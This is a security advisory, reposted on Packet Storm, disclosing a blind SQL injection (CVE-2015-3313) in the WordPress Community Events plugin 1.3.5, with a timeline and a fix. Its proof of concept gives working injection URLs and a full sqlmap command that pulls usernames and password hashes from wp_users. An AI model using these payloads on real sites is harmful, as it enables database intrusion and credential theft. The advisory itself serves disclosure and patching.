Lucene search

K
packetstormHannes TrundePACKETSTORM:131530
HistoryApr 20, 2015 - 12:00 a.m.

WordPress Community Events 1.3.5 SQL Injection

2015-04-2000:00:00
Hannes Trunde
packetstormsecurity.com
14

EPSS

0.007

Percentile

79.8%

`=======================================================================  
title: SQL Injection  
product: WordPress Community Events Plugin  
vulnerable version: 1.3.5 (and probably below)  
fixed version: 1.4  
CVE number: CVE-2015-3313  
impact: CVSS Base Score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)  
homepage: https://wordpress.org/plugins/community-events/  
found: 2015-01-07  
by: Hannes Trunde  
  
mail: [email protected]  
twitter: @hannestrunde  
  
=======================================================================  
  
  
Plugin description:  
-------------------  
"The purpose of this plugin is to allow users to create a schedule of upcoming   
events and display events for the next 7 days in an AJAX-driven box or   
displaying a full list of upcoming events."  
  
Source: https://wordpress.org/plugins/community-events/  
  
  
Recommendation:  
---------------  
The author has provided a fixed plugin version which should be installed   
immediately.  
  
  
Vulnerability overview/description:  
-----------------------------------  
Because of insufficient input validation, a blind SQL injection attack can be  
performed within the search function to obtain sensitive information from the   
database. To exploit this vulnerability, there has to be at least one planned   
event on the calendar.  
  
  
Proof of concept:  
-----------------  
The following HTTP request to the Community Events full schedule returns the   
event(s) planned in the specified year:  
===============================================================================  
http://www.site.com/?page_id=2&eventyear=2015 AND 1=1 )--&dateset=on&eventday=1  
===============================================================================  
  
The following HTTP request returns a blank page, thus confirming the blind SQL  
injection vulnerability:  
===============================================================================  
http://www.site.com/?page_id=2&eventyear=2015 AND 1=0 )--&dateset=on&eventday=1  
===============================================================================  
  
Obtaining users and password hashes with sqlmap may look as follows (--string   
parameter has to contain (part of) the name of the event, enabling sqlmap to   
differentiate between true and false statements):  
================================================================================  
sqlmap -u "http://www.site.com/?page_id=2&eventyear=2015&dateset=on&eventday=1" -p "eventyear" --technique=B --dbms=mysql --suffix=")--" --string="Test" --sql-query="select user_login,user_pass from wp_users"  
================================================================================  
  
  
Contact timeline:  
-----------------  
2015-04-08: Contacting author via mail.  
2015-04-09: Author replies and announces a fix within a week.  
2015-04-12: Mail from author, stating that plugin has been updated.  
2015-04-14: Posting information to the open source software security mailing   
list: http://openwall.com/lists/oss-security/2015/04/14/5  
2015-04-18: Release of security advisory.  
  
  
Solution:  
---------  
Update to the most recent plugin version.  
  
  
Workaround:  
-----------  
See solution.  
`

EPSS

0.007

Percentile

79.8%